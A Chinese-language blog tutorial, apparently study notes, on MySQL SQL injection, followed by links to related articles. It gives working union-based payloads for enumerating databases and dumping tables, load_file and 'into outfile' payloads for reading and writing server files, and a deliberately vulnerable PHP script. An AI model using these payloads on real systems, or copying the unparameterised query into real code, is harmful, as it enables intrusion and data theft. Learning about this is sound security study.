sql注入--mysql
mysql数据库结构:
数据库A --> 表名 --> 列名 --> 数据
数据库B --> 表名 --> 列名 --> 数据
mysql数据库信息:
mysql 5.0以上自带数据库:information_schema
information_schema.schemata: 数据库下的schemata库名,含义:存储所有数据库下的库名信息的表。
information_schema.tables: 数据库下的tables表名,含义:存储所有数据库下的表名信息的表。
information_schema.columns: 数据库下的columns表名,含义:存储所有数据库下的列名信息的表。
database():数据库名
user():数据库用户
version():数据库版本
@@version_compile_os:操作系统
schema_name:库名
table_name:表名
column_name:列名
mysql注入过程:
(1) 判断注入点: ?id=1 and 1=1 ;? id=1 and 1=2
(2) 判断长度: ?id=1 order by 3
(3) 获取基本信息: @@version_compile_os , version() , database() , user()
(4) 获取库名: ?id=1 union select table_schema,2,3 from information_schema.schemata
(5) 获取表名: ?id=1 union select table_name,2,3 from information_schema.tables where table_schema = 库名[16进制]
(6) 获取列名: ?id=1 union select column_name,2,3 from information_schema.columns where table_schema = 库名[16进制]
and table_name = 表名[16进制]
(7) 获取数据: ?id=1 union select 列名[16进制],列名[16进制],3 from 表名[16进制]
mysql文件读写操作:
(1) 读取操作:
?id=1 union select load_file('d:/123.txt'),2,3
(2) 写入操作:
?id=1 union select '123',2,3 into outfile 'd:/123.txt'
注意: 路径问题:
使用"/"或者"\\" ; 原因[编程中"\"多半是转义]
编码问题:
数据中有单引号,将数据编码16进制即可
连接mysql数据库语句:
<?php
header("content-type:text/html;charset=utf8");
$id=$_GET['x'];
$conn=mysql_connect("127.0.0.1","root","root");
mysql_select_db("sql",$conn);
$sql = "select * from php where id=$id";
$result=mysql_query($sql);
while($row=mysql_fetch_array($result)){
echo "<br>"."编号".$row['id']."<br>";
echo "<br>"."用户".$row['user']."<br>";
echo "<br>"."密码".$row['password']."<br>";
}
mysql_close($conn);
echo "<br>"."当前执行的sql语句:".$sql;
?>
网站路径获取方法
(1) 遗留文件:
一般在网站根目录下,命名有php.php info.php phpinfo.php,test.php php_info.php等。

(2) 报错显示

(3)漏洞爆路径

(4) 读取搭建平台配置文件

(5)社工(字典猜解,谷歌黑客等)
D:/www/ ; D:/wwwroot/ ; D:/web/ 等

sql注入--mysql的更多相关文章
- SQL 注入~MySQL专题
Recently, 团队在做一个关于SQL的项目,这个专题是项目中的一部分,该部分正是由我来负责的.今天,分享给正在奋斗中的伙伴们,愿,你们在以后的学习道路中能有自己的收获. ...
- c# 登录 防止sql注入 mysql数据库
利用参数化 防止SQL注入 public string serachName(string name) { string result = ""; try { conn.Open( ...
- sql注入mysql注入
#跨库查询及应用思路 information_schema表特性,记录数据库名.表名.列名对应表 information_schema.schemata:存储所有数据库名 schema_name:数据 ...
- sql注入的基本防范手段
基本的sql注入防御手段,概括来讲就是权限控制和关键词过滤. 防御sql注入 ============================================================= ...
- web安全—sql注入漏洞
SQL注入-mysql注入 一.普通的mysql注入 MySQL注入不像注入access数据库那样,不需要猜.从mysql5.0以上的版本,出现一个虚拟的数据库,即:information_schem ...
- pymysql 解决 sql 注入问题
1. SQL 注入 SQL 注入是非常常见的一种网络攻击方式,主要是通过参数来让 mysql 执行 sql 语句时进行预期之外的操作. 即:因为传入的参数改变SQL的语义,变成了其他命令,从而操作了数 ...
- 渗透测试初学者的靶场实战 1--墨者学院SQL注入—布尔盲注
前言 大家好,我是一个渗透测试的爱好者和初学者,从事网络安全相关工作,由于爱好网上和朋友处找了好多关于渗透的视频.工具等资料,然后自己找了一个靶场,想把自己练习的体会和过程分享出来,希望能对其他渗透爱 ...
- 渗透测试初学者的靶场实战 3--墨者学院SQL注入—宽字节盲注
墨者SQL注入-MYSQL数据库实战环境 实践步骤 1. 决断注入点 输入单引号,提示错误信息: 输入and 1=1 返回页面正常: 输入 and 1=2 返回正常 输入-1,返回异常: 2. 带入s ...
- 渗透测试初学者的靶场实战 2--墨者学院SQL注入—报错盲注
墨者SQL注入-MYSQL数据库实战环境 实践步骤 1. 决断注入点 输入单引号,提示错误信息: 输入and 1=1 返回页面正常: 输入 and 1=2 返回正常 输入-1,返回异常: 2. 带入s ...
随机推荐
- Struts2开发基础
Struts2开发基础 struts2采用拦截器的机制来处理用户的请求,使得业务逻辑控制器能够与ServletAPI完全脱离开. 1. Hello World! 配置web.xml <?xml ...
- mybatis框架下物理分页的实现(整个工程采用的是springmvc、spring、mybatis框架,数据库是mysql数据库)
(一)关于分页拦截器的简单理解 首先,要开发MyBatis的插件需要实现org.apache.ibatis.plugin.Interceptor接口,这个接口将会要求实现几个方法:intercept( ...
- 【ibatis】IBatis的SQL批量操作
1.Ibatis批量添加(传入class的list即可) <insert id="Add" resultMap="Select" parameterCla ...
- leetcode937-java
937. 重新排列日志文件 一个简单题让我做了将近一个小时去.. 你有一个日志数组 logs.每条日志都是以空格分隔的字串. 对于每条日志,其第一个字为字母数字标识符.然后,要么: 标识符后面的每个字 ...
- Java - HashSet源码解析
java提高篇(二四)-----HashSet 一.定义 public class HashSet<E> extends AbstractSet<E> implements S ...
- 如何高效的使用-Notepad++
Notepad++功能比 Windows 中的 Notepad(记事本)强大,除了可以用来制作一般的纯文字说明文件,也十分适合编写计算机程序代码.Notepad++ 不仅有语法高亮度显示,也有语法折叠 ...
- WebServer搭建过程
第一步,新建Web网站项目 第二步: 右击项目解决方案,选择添加新建项 选择Web服务项 第三步,在asmx方法中将Hello World注释掉,然后编写自己的方法,这里根据项目的不同可以做不同的处理 ...
- python的深浅拷贝以及fromkeys的用法
1.join()的用法:使用前面的字符串.对后面的列表进行拼接,拼接结果是一个字符串 # lst = ["alex","dsb",'wusir','xsb'] ...
- 【代码笔记】iOS-获得现在的时间(2015-09-11)
一,代码. - (void)viewDidLoad { [super viewDidLoad]; // Do any additional setup after loading the view, ...
- 各类无次数限制的免费API接口整理
各类无次数限制的免费API接口整理,主要是聚合数据上和API Store上的一些,还有一些其他的. 聚合数据提供30大类,160种以上基础数据API服务,国内最大的基础数据API服务,下面就罗列一些免 ...